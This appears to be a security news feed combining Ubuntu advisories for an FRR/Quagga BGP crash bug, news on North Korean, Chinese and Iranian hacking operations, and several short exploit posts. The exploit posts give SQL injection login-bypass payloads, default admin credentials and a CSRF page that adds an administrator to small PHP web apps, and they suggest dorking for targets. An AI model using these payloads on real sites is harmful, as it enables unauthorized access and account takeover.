Ubuntu Security Notice 7017-1 - Iggy Frankovic discovered that Quagga incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause Quagga to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7017-1September 17, 2024quagga vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Quagga could be made to crash if it received specially crafted networktraffic.Software Description:- quagga: BGP/OSPF/RIP routing daemonDetails:Iggy Frankovic discovered that Quagga incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause Quaggato crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   quagga                          1.2.4-4ubuntu0.5   quagga-bgpd                     1.2.4-4ubuntu0.5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7017-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/quagga/1.2.4-4ubuntu0.5

Ubuntu Security Notice USN-7017-1

Ubuntu Security Notice 7016-1 - Iggy Frankovic discovered that FRR incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7016-1September 17, 2024frr vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:FRR could be made to crash if it received specially crafted networktraffic.Software Description:- frr: FRRouting suite of internet protocolsDetails:Iggy Frankovic discovered that FRR incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause FRR tocrash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   frr                             8.4.4-1.1ubuntu6.2Ubuntu 22.04 LTS   frr                             8.1-1ubuntu1.11In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7016-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/frr/8.4.4-1.1ubuntu6.2   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.11

Ubuntu Security Notice USN-7016-1

Membership Management System version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Membership Management System 1.1 Auth By Pass Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/Membership/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Membership Management System 1.1 SQL Injection

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : HYSCALE System v1.9 CSRF add admin Vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Registration Form</title>  
</head>  
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

        <label for="username">Username:</label>  
    <input type="text" name="username" id="username" required><br><br>

    <label for="email">Email:</label>  
    <input type="email" name="email" id="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" name="password" id="password" required><br><br>

    <label for="dob">Date of Birth:</label>  
    <input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

    <label>Gender:</label><br>  
    <input type="radio" name="gender" value="Male" id="male" required>  
    <label for="male">Male</label><br>  
    <input type="radio" name="gender" value="Female" id="female">  
    <label for="female">Female</label><br><br>

    <label for="usertype">User Type:</label>  
    <select name="usertype" id="usertype" required>  
        <option value="admin">Admin</option>  
        <option value="user">User</option>  
        <option value="guest">Guest</option>  
    </select><br><br>

    <label for="target_sales">Target Sales:</label>  
    <input type="text" name="target_sales" id="target_sales" required><br><br>

    <input type="submit" value="Submit">

</form>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

Furniture Master version 2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Furniture master v2 Sql injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_furniture-master-2-zip.zip      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodInfo.php?prodId=1 <===== inject here[+] http://127.0.0.1/furniture_master/prodInfo.php?prodId=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Furniture Master 2 SQL Injection

Food Ordering and Table Reservation System for Restaurants version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: murja      Password: 123[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Food Ordering And Table Reservation System For Restaurants 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/bpmsp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is

Cyber Espionage / Malware

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.

The activity cluster is being tracked by Google-owned Mandiant under the moniker **UNC2970**, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).

The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).

The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.

"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.

"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."

The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.

In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.

It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.

This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.

It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.

"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."

TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.

Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.

"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

Participants in a hacking competition with ties to China’s military were, unusually, required to keep their activities secret, but security researchers say the mystery only gets stranger from there.

Capture the flag hacking contests at security conferences generally serve two purposes: to help participants develop and demonstrate computer hacking and security skills, and to assist employers and government agencies with discovering and recruiting new talent.

But one security conference in China may have taken its contest a step further—potentially using it as a secret espionage operation to get participants to collect intelligence from an unknown target.

According to two Western researchers who translated documentation for China’s Zhujian Cup, also known as the National Collegiate Cybersecurity Attack and Defense Competition, one part of the three-part competition, held last year for the first time, had a number of unusual characteristics that suggest its potentially secretive and unorthodox purpose.

Capture the flag (CTF) and other types of hacking competitions are generally hosted on closed networks or “cyber ranges”—dedicated infrastructure set up for the contest so that participants don’t risk disrupting real networks. These ranges provide a simulated environment that mimics real-world configurations, and participants are tasked with finding vulnerabilities in the systems, obtaining access to specific parts of the network, or capturing data.

There are two major companies in China that set up cyber ranges for competitions. The majority of the competitions give a shout out to the company that designed their range. Notably, Zhujian Cup didn’t mention any cyber range or cyber range provider in its documentation, leaving the researchers to wonder if this is because the contest was held in a real environment rather than a simulated one.

The competition also required students to sign a document agreeing to several unusual terms. They were prohibited from discussing the nature of the tasks they were asked to do in the competition with anyone; they had to agree not to destroy or disrupt the targeted system; and at the end of the competition, they had to delete any backdoors they planted on the system and any data they acquired from it. And unlike other competitions in China the researchers examined, participants in this portion of the Zhujian Cup were prohibited from publishing social media posts revealing the nature of the competition or the tasks they performed as part of it.

Participants also were prohibited from copying any data, documents, or printed materials that were part of the competition; disclosing information about vulnerabilities they found; or exploiting those vulnerabilities for personal purposes. If a leak of any of this data or material occurred and caused harm to the contest organizers or to China, according to the pledge that participants signed, they could be held legally responsible.

“I promise that if any information disclosure incident (or case) occurs due to personal reasons, causing loss or harm to the organizer and the country, I, as an individual, will bear legal responsibility in accordance with the relevant laws and regulations,” the pledge states.

The contest was hosted last December by Northwestern Polytechnical University, a science and engineering university in Xi'an, Shaanxi, that is affiliated with China’s Ministry of Industry and Information Technology and also holds a top-secret clearance to conduct work for the Chinese government and military. The university is overseen by China’s People’s Liberation Army.

Neither the university nor several cosponsors of the contest responded to WIRED’s inquiry about the competition.

Dakota Cary, a strategic advisory consultant at security firm Sentinel One, and Eugenio Benincasa, senior cyber defense researcher at the Center for Security Studies at ETH Zurich university in Switzerland, discovered the unusual contest and its requirements while researching China’s hacking competitions. The two have written a report for the Atlantic Council and plan to present their findings on Thursday at the Labscon security conference in Arizona.

They acknowledge that there is no hard evidence that the competition was used to attack a real-world target and that the evidence they do have is circumstantial. But they said they are 85 percent confident that this is what occurred because no alternative explanations make sense.

“There are a lot of good alternative explanations, and none of them have supporting evidence,” says Cary, who is fluent in Mandarin and has studied China’s offensive hacking capabilities extensively for years.

One possible alternative is that the target of the attack was a domestic company or organization that cooperated with the contest in order to give students experience in finding vulnerabilities in a real network and also provide the company with a threat assessment that could help it better secure its network against real-world adversaries.

Cary, however, says such exercises in China are called “crowd-testing” contests. But nowhere in the description of the Zhujian Cup does this phrase appear. “If it’s a real CTF exercise, why are \[participants\] deleting data and … backdoors?” he asks. And why are students told they could be held legally responsible if data or material they possess as part of the competition gets leaked? And if the students were attacking a target inside a cyber range, how could this cause “loss or harm to the organizer and the country,” per the wording in the pledge?

The competition was held on a weekend over the New Year’s holiday last year, on December 30 and 31. If the target was indeed a real-world network, the researchers note that holidays are often a time when security teams are short-staffed or less attentive and alert to intrusions. About 200 students from 29 schools participated in the weekend competition, which consisted of three parts, according to a description of the contest published by the school: a theoretical knowledge competition, a vulnerability discovery contest, and a “public-network target, actual combat attack competition.” The latter is the portion that Cary and Benincasa believe focused on a real-world target.

The researchers surveyed more than 120 capture-the-flag competitions organized in China since 2004—many of them held annually—to understand how the country has used such competitions to recruit talent and expand its cyber offensive and defensive capabilities. They say that China really began to focus on developing its cyber talent in 2015, after the Edward Snowden leaks had exposed the extensive hacking operations conducted by the US National Security Agency for intelligence purposes.

To strengthen its cyber defenses, China focused on revamping and expanding cybersecurity education programs and recruitment efforts between 2015 and 2021. A big part of the latter included the development and regulation of capture-the-flag competitions.

CTFs aren’t unique to China, of course; they are held around the world, including in the US, where one of the oldest—held annually at the Defcon hacking conference in Las Vegas—has existed for nearly two decades. The US government also hosts hackathons to help recruit talent, though not at the scale of China.

Since 2014, the researchers say, more than 540 capture-the-flag rounds of competition have occurred in China. The most intense activity began in 2018, which is also when China’s Central Cyberspace Affairs Commission and Ministry of Public Security issued a notice about the regulation and promotion of such contests. Now Chinese nationals must apply to the MPS for permission to participate in hacking competitions outside of China. Chinese leaders noticed Chinese students and security professionals were having great success competing in hacking competitions internationally and realized that each time someone from China won one of these competitions, the country was losing a potentially valuable asset with the vulnerabilities they disclosed as part of the contest. Now any vulnerabilities discovered by a Chinese national must be reported to the government and not disclosed publicly.

But importantly, China’s efforts in building its domestic capture-the-flag contests means that today it has one of the most robust hacking contest ecosystems in the world, the researchers say, including sector-specific ones for health care and law enforcement. The researchers estimate that about 300,000 people have participated in the contests over the last decade, but the researchers found only four that are open to students. The contests are led by universities across the country while also being supported by companies and the government. Contest winners and others who demonstrate good skill get entered into a national database.

Cary says that if the Zhujian Cup did involve a live target, it’s “remarkable” that the organizers put students in a position that could make them legally culpable if they got caught. But if so, it wouldn’t be the first time the government used students for intelligence operations. In 2022, the Financial Times reported that China had recruited unwitting university students to translate documents and data stolen in espionage operations conducted by the country’s hacking teams, reportedly without telling the students the source of the material.

This also may not be the first time a hacking competition in China played a role in a real-world breach subsequently attributed to China. In 2015, researchers at Threat Connect found curious evidence of a possible overlap between the TOPSEC Cup hacking competition coordinated by China’s Southeast University in 2014 and the subsequent hack of health care giant Anthem that same year. Southeast has financial connections to China’s civilian intelligence agency, the Ministry of State Security.

Did a Chinese University Hacking Competition Target a Real Victim?

Increasing attacks by the OilRig/APT34 group linked to Iran's Ministry of Intelligence and Security show that the nation's capabilities are growing, and targeting regional allies and enemies alike.

Source: Novikov Aleksey via Shutterstock

In its latest cyberattack on a Middle Eastern nation using its proxies in cyberspace, Iran continues to ramp up its cyber operations against rivals and allies.

In the attack, a cyberespionage group linked to Iran's Ministry of Intelligence and Security (MOIS) and known as APT34 targeted government ministries in Iraq, a nation that was once an enemy and now is sometimes a rival and sometimes an ally of Iran. The attack had all the hallmarks of the group, also known as Hazel Sandstorm: custom infrastructure using email tunneling for communications, use of two malware programs similar to previous APT34 code, and domain-naming schemes similar to previous operations.

Previous attacks by APT34 (aka OilRig, Helix Kitten, and Hazel Sandstorm) using similar tools and methods targeted other nations in the region, including Jordan, Lebanon, and Pakistan, according to an analysis by cybersecurity firm Check Point's research group.

"The goal is likely espionage, because those countries are at least, to some degree, allies of Iran, so I don't think, in this case, the main goal is destruction," says Sergey Shykevich, threat intelligence group manager at Check Point Research. "We also don't have any hints on the technological side that there is any destructive goal, and from what we do see — specifically in Iraq — we clearly see that the goal is data exfiltration and \[the like\]."

Following the start of the conflict between Israel and Hamas nearly a year ago, rivalries and relationships throughout the region have changed. In late spring, Iran criticized Jordan — and to a lesser extent other Arab nations — for reportedly helping Israel track and interdict missiles during Iran's April 13 attack on the Jewish nation. Meanwhile, Iraq continues to have strong ties to Iran through proxy networks and political parties aligned with Iran.

**Iran's Cyber Operations Grow**

At the same time, Iran has expanded its cyber operations strategy in the region. A group linked to the Iranian Islamic Revolutionary Guard Corps (IRGC) — and known variously as APT33 (Mandiant) and Peach Sandstorm (Microsoft) — has targeted communications equipment, government agencies, and the oil-and-gas industry in the United Arab Emirates and the United States, typically to gather intelligence, Microsoft stated in August.

Late last month, the US Cybersecurity and Infrastructure Security Agency (CISA) warned that the Iranian group Lemon Sandstorm, also known as Fox Kitten, had leveled ransomware attacks against various countries, and another group, Charming Kitten, or APT42, targeted individuals associated with both the Democratic and Republican presidential campaigns.

Iran is increasingly flexing its muscles in cyberspace, and especially against rivals throughout the Middle East region, says Mohamed Fahmy, a cyberthreat intelligence researcher with cybersecurity firm Trend Micro.

"Iranian APT groups, including APT34, have become very active recently in targeting the Middle East, particularly the government sector in the Gulf region," he says. "From what we’ve seen of APT34’s toolset and activities, they aim to infiltrate entities as much as possible, leveraging compromised infrastructure to launch further attacks. ... APT34's primary goals seem to be espionage and stealing sensitive government information."

**Evasive New Malware: Veaty and Spearal**

In the latest campaign, APT34 used fake document attachments targeting Iraq between March and May of this year, and likely used social engineering to convince users to open the links and run an installer. The attack results in the installation a .NET backdoor. Currently, one backdoor is called Veaty and the other Spearal, and both malware binaries allow command-and-control (C2) of compromised systems.

The techniques used by Veaty and Spearal show similarities to two other malware families — known as Karkoff and Saitama — both of which are attributed to APT34, Check Point stated in its analysis.

Iranian cyber operations groups tend to use custom DNS tunneling protocols and a C2 channel based on email subject lines, according to the research: "This distinctive blend of straightforward tools, written in .NET, combined with sophisticated C2 infrastructure, is common among similar Iranian threat actors."

The capabilities of APT34 and Iran's other groups will only increase, says Check Point's Shykevich.

"They just improve it," he says. "They just use the same content, but each target, or each country they attack, they deploy a new generation of the same concept ..., where they improve it and make it more stealthy \[or add other features\]."

Companies in the Middle East should focus on implementing a zero-trust architecture to strengthen defenses, including establishing a mature security operations center (SOC) with managed endpoint detection and response (MDR) capabilities, says Trend Micro's Fahmy.

The increased geopolitical tensions in the region will only mean increasing efforts to gain intelligence through cyberattacks, he says.

"Government sectors in the Middle East and Gulf region should take this threat seriously," he says. "These groups aim to blend into the network environment by customizing their malware to avoid detection, \[so\] understanding their techniques, which have not changed significantly, is crucial."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Tag

#vulnerability